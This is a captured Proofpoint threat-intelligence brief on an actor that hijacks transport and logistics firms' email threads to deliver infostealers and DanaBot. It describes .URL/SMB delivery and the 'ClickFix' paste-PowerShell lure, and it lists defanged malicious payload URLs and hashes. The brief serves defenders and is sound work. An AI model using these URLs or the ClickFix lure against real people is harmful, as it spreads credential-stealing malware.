www.proofpoint.com
Open in
urlscan Pro
2a02:e980:e6::cf
Public Scan
Submitted URL: https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineer...
Effective URL: https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering
Submission: On September 27 via api from IN — Scanned from US
Effective URL: https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering
Submission: On September 27 via api from IN — Scanned from US
Form analysis 3 forms found in the DOM
<form class="header-nav__search-form">
<input type="text" class="header-nav__search-input" placeholder="">
<input type="submit" class="header-nav__search-button" val="Search">
</form><form id="mktoForm_19277" data-mkto-id="19277" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label="" data-lang-code="us" data-validate-email="1"
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft js-visible mkto-form-processed" data-asset-type="Blogs Subscribe" novalidate="novalidate"
style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); width: 1601px;">
<style type="text/css"></style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 5px;">
<div class="mktoOffset" style="width: 5px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email" id="LblEmail" class="mktoLabel mktoHasWidth" style="width: 150px;">
<div class="mktoAsterix">*</div>Business Email:
</label>
<div class="mktoGutter mktoHasWidth" style="width: 5px;"></div><input id="Email" name="Email" placeholder="Business Email *" maxlength="255" aria-labelledby="LblEmail InstructEmail" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 200px;"><span id="InstructEmail" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="blogInterest" class="mktoField mktoFieldDescriptor mktoFormCol" value="All Blog Posts" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Employees_Picklist__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="State" class="mktoField mktoFieldDescriptor mktoFormCol" value="State/Province" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="Website" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Most_Recent_Medium_Detail__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="www-pfpt" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Industry" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Website" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="AnnualRevenue" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandbasesid" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="demandBase_Data_Source" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Primary_Product_Interest__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="UTM_Post_ID__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmcampaign" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="utmterm" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="db_employee_count" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Unsubscribed" class="mktoField mktoFieldDescriptor mktoFormCol" value="0" placeholder="" style="margin-bottom: 5px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoNative" style="margin-left: 110px;"><button type="submit" class="mktoButton">Submit</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="19277" placeholder=""><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="309-RHV-619" placeholder=""><input type="hidden" name="Website_Conversion_URL__c" class="mktoField mktoFieldDescriptor"
value="https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering#new_tab"><input type="hidden" name="gAClientID" class="mktoField mktoFieldDescriptor"
value="1406213108.1727421963">
</form><form data-mkto-id="19277" data-mkto-base="//app-abj.marketo.com" data-munchkin-id="309-RHV-619" data-submit-text="" data-redirect-link="" data-prefill="" data-event-label="" data-lang-code="us" data-validate-email="1"
class="mk-form__form marketo-form-block__form mktoForm mktoHasWidth mktoLayoutLeft" data-asset-type="Blogs Subscribe" novalidate="novalidate"
style="font-family: inherit; font-size: 16px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;"></form>Text Content
Skip to main content English (Americas) Search Login * Platform * Products * Solutions Proofpoint Contact Search * Platform * Products * Solutions * Partners * Resources * Company Search Login English (Americas) Platform Products Solutions Partners Resources Company Protect People Multi-layered, adaptive defenses for threat detection, impersonation, and supplier risk. Email Security Impersonation Protection More products Defend Data Transform your information protection with a human-centric, omni-channel approach. Enterprise DLP Adaptive Email DLP Insider Threat Management Intelligent Compliance Mitigate Human Risk Unlock full user risk visibility and drive behavior change. Security Awareness Augment Your Capabilities Managed Services Product Packages More Protect People Products Account Take-Over and Identity Protection Secure vulnerable identities, stop lateral movement and privilege escalation. Adaptive Email Security Stop more threats with a fully integrated layer of behavioral AI. Secure Email Relay Secure your application email and accelerate DMARC implementation Solutions by Use Case How Proofpoint protects your people and data. Authenticate Your Email Protect your email deliverability with DMARC. Combat Email and Cloud Threats Protect your people from email and cloud threats with an intelligent and holistic approach. More use cases Solutions by Industry People-centric solutions for your organization. Federal Government Cybersecurity for federal government agencies. State and Local Government Protecting the public sector, and the public from cyber threats. More industries Comparing Proofpoint Evaluating cybersecurity vendors? Check out our side-by-side comparisons. View comparisons SOLUTIONS BY USE CASE How Proofpoint protects your people and data. Change User Behavior Help your employees identify, resist and report attacks before the damage is done. Combat Data Loss and Insider Risk Prevent data loss via negligent, compromised and malicious insiders. Modernize Compliance and Archiving Manage risk and data retention needs with a modern compliance and archiving solution. Protect Cloud Apps Keep your people and their cloud apps secure by eliminating threats and data loss. Prevent Loss from Ransomware Learn about this growing threat and stop attacks by securing ransomware's top vector: email. Secure Microsoft 365 Implement the best security and compliance solution for Microsoft 365. SOLUTIONS BY INDUSTRY People-centric solutions for your organization. Higher Education A higher level of security for higher education. Financial Services Eliminate threats, build trust and foster growth for your organization. Healthcare Protect clinicians, patient data, and your intellectual property against advanced threats. Mobile Operators Make your messaging environment a secure environment. Internet Service Providers Cloudmark email protection. Small and Medium Businesses Big-time security for small business. PROOFPOINT VS. THE COMPETITION Side-by-side comparisons. Proofpoint vs. Abnormal Security Proofpoint vs. Mimecast Proofpoint vs. Cisco Proofpoint vs Microsoft Proofpoint vs. Microsoft Purview Proofpoint vs. Legacy DLP PARTNERS Deliver Proofpoint solutions to your customers. Channel Partners Archive Extraction Partners Learn about Extraction Partners. GSI and MSP Partners Learn about our global consulting. Technology and Alliance Partners Learn about our relationships. Social Media Protection Partners Learn about the technology and.... Proofpoint Essentials Partner Programs Small Business Solutions . Become a Channel Partner RESOURCES Find reports, webinars, blogs, events, podcasts and more. Resource Library Blog Keep up with the latest news and happenings. Webinars Browse our webinar library to learn about the latest threats, trends and issues in cybersecurity. Cybersecurity Academy Earn your certification to become a Proofpoint Certified Guardian. Podcasts Learn about the human side of cybersecurity. New Perimeters Magazine Get the latest cybersecurity insights in your hands. Threat Glossary Learn about the latest security threats. Events Connect with us at events to learn how to protect your people and data from ever-evolving threats. Customer Stories Read how our customers solve their most pressing cybersecurity challenges. COMPANY Proofpoint protects organizations' greatest assets and biggest risks: their people. About Proofpoint Why Proofpoint Learn about our unique people-centric approach to protection. Careers Stand out and make a difference at one of the world's leading cybersecurity companies. News Center Read the latest press releases, news stories and media highlights about Proofpoint. Privacy and Trust Learn about how we handle data and make commitments to privacy and other regulations. Environmental, Social, and Governance Learn how we apply our principles to positively impact our community. Support Access the full range of Proofpoint support services. PLATFORM Discover the Proofpoint human-centric platform. Learn More Proofpoint Nexus Detection technologies to protect people and defend data. Proofpoint Zen Protect and engage users wherever they work. Search Proofpoint Try searching for Email Security Phishing DLP Email Fraud Select Product Login * Support Log-in * Proofpoint Cybersecurity Academy * Digital Risk Portal * Email Fraud Defense * ET Intelligence * Proofpoint Essentials * Sendmail Support Log-in Select Language * English (Americas) * English (Europe, Middle East, Africa) * English (Asia-Pacific) * Español * Deutsch * Français * Italiano * Português * 日本語 * 한국어 Blog Threat Insight Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware SECURITY BRIEF: ACTOR USES COMPROMISED ACCOUNTS, CUSTOMIZED SOCIAL ENGINEERING TO TARGET TRANSPORT AND LOGISTICS FIRMS WITH MALWARE Share with your network! September 24, 2024 The Proofpoint Threat Research Team WHAT HAPPENED Proofpoint researchers are tracking a cluster of activity targeting transportation and logistics companies in North America to deliver a variety of different malware payloads. Notably, this activity leverages compromised legitimate email accounts that belong to transportation and shipping companies. At this time, it is unclear how the actor achieves access to the compromised accounts. The actor then injects malicious content into existing conversations within the account’s inbox, which makes the messages look legitimate. Proofpoint has identified at least 15 compromised email accounts used during these campaigns. Researchers have been tracking this activity cluster since late May 2024. Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport. In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2. Most campaigns use messages with Google Drive URLs leading to an internet shortcut (.URL) file, or a .URL file attached directly to the message. If executed, it uses SMB to access an executable from the remote share, which installs the malware. Actor responds from a compromised account to a request within an ongoing thread. Actor using a compromised account to post a malicious link to an ongoing thread. Campaigns typically include less than 20 messages and impact a small number of customers, all in the same transport/logistics industries in North America. In August 2024, the actor also began using the “ClickFix” technique to deliver their malware. The messages contained URLs which directed users through various dialogue boxes leading them to copy, paste, and run a Base64 encoded PowerShell script contained within the HTML, a technique called "ClickFix." The scripts led to an MSI file used to load DanaBot. Initial “ClickFix” dialogue box in which clicking the “Fix it” button copies a Base64 encoded PowerShell script. Final “ClickFix” dialogue box with instructions to open Windows PowerShell and paste and run the PowerShell script. While Proofpoint has observed this technique leveraged by other threat actors impersonating Word or Chrome updates, these campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management. ATTRIBUTION Proofpoint does not currently attribute this activity cluster to an identified threat actor (TA). Similar techniques and infrastructure associated with ClickFix and the combination of Google Drive URLs, .URL files, and SMB have been observed used by other threat actors and campaigns. Proofpoint researchers assess that the threat actor discussed in this Security Brief is purchasing this infrastructure from third party providers. Based on the observed initial access activity, malware delivery, and infrastructure, Proofpoint assesses with moderate confidence the activity aligns with financially motivated, cybercriminal objectives. WHY IT MATTERS Threat actors are increasingly tailoring lures to be more realistic to entice recipients to click on a link or download attachments. Compromising legitimate email accounts and sending malicious links and attachments to an existing email conversation achieves this goal and raises the risk that recipients will install malware. The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company’s operations before sending campaigns. The language used in the lures and content also indicate familiarity with typical business workflows. This activity aligns with a trend Proofpoint researchers have observed across the cybercriminal threat landscape. Threat actors are developing more sophisticated social engineering and initial access techniques across the delivery attack chain while relying more on commodity malware rather than complex and unique malware payloads. Members of the transportation/logistics industry, and users in general, should exercise caution with emails coming from known senders which deviate from normal activity or content, particularly when combined with unusual looking links and file types such as described in this Security Brief. In other words, emails that do not look or feel right and trigger a sixth sense that something is off. When encountering such activity users should contact the sender using another means to confirm their authenticity. INDICATORS OF COMPROMISE Indicator Description First Observed 199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431 SHA256 .URL file 2024-05-22 ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e SHA256 .URL file 2024-07-01 e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842 SHA256 .URL file 2024-07-12 e5ed1a273faf5174dbd8db9d6d3657b81dc2cbc2e0af28cfe76f41c3d2f2fc37 SHA256 .URL file 2024-07-24 f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f SHA256 .URL file 2024-08-05 0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2 SHA256 .URL file 2024-08-24 582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04 SHA256 .URL file 2024-09-06 hxxp://89[.]23[.]98[.]98/file/14242.exe URL Payload 2024-05-22 hxxp://89[.]23[.]98[.]98/file/ratecon.exe URL Payload 2024-07-01 hxxp://89[.]23[.]98[.]98/file/rate_confirmation.vbs URL Payload 2024-07-12 hxxp://89[.]23[.]98[.]98/file/Rateconfirm.exe URL Payload 2024-07-24 hxxp://89[.]23[.]98[.]98/file/carrier.exe URL Payload 2024-08-05 hxxp://185[.]217[.]197[.]84/file/remittance.exe URL Payload 2024-08-24 hxxp://185[.]217[.]197[.]84/file/information_package.exe URL Payload 2024-09-06 hxxps://live-samsaratrucking[.]com/true-tracking-32934.html URL ClickFix 2024-08-19 hxxp://ambcrrm[.]com/ URL ClickFix 2024-09-03 hxxps://ambccm[.]com/Astra/index.html URL ClickFix 2024-09-10 hxxps://idessit[.]com/fn.msi URL Danabot Payload 2024-08-19 hxxps://ambccm[.]com/3.msi URL Danabot Payload 2024-09-05 hxxps://ambcrrm[.]com/3.msi URL Danabot Payload 2024-09-03 957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d SHA256 14242.exe Suspected Lumma 2024-06-14 2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319 SHA256 rate_confirmation.vbs Lumma 2024-07-12 8fe96fb9d820db0072fe0423c13d2d05f81a9cf0fdd6f4e2ee78dc4ca1d37618 SHA256 ratecon.exe StealC/NetSupport 2024-07-24 cdf160c63f61ae834670fdaf040411511dc2fc0246292603e7aa8cd742d78013 SHA256 Rateconfirm.exe StealC 2024-07-25 d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d SHA256 carrier.exe Arechclient2 2024-08-05 fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7 SHA256 fn.msi Danabot 2024-08-19 163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a SHA256 remittance.exe 2024-08-24 37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235 SHA256 3.msi Danabot 2024-09-03 1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3 SHA256 information_package.exe Lumma Stealer 2024-09-06 b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86 SHA256 information_package.exe StealC/NetSupport 2024-09-10 Analyst note: Proofpoint researchers identified overlap in infrastructure from this threat cluster with suspected UAC-0050 activity but does not assess the activity sets are related at this time. Previous Blog Post SUBSCRIBE TO THE PROOFPOINT BLOG * Business Email: Submit Products * Protect People * Defend Data * Mitigate Human Risk * Premium Services Get Support * Product Support Login * Support Services * IP Address Blocked? Connect with Us * +1-408-517-4710 * Attend an Event * Contact Us * Free Demo Request More * About Proofpoint * Why Proofpoint * Careers * Leadership Team * News Center * Privacy and Trust © 2024. All rights reserved. Terms and conditions Privacy Policy Sitemap * * * * *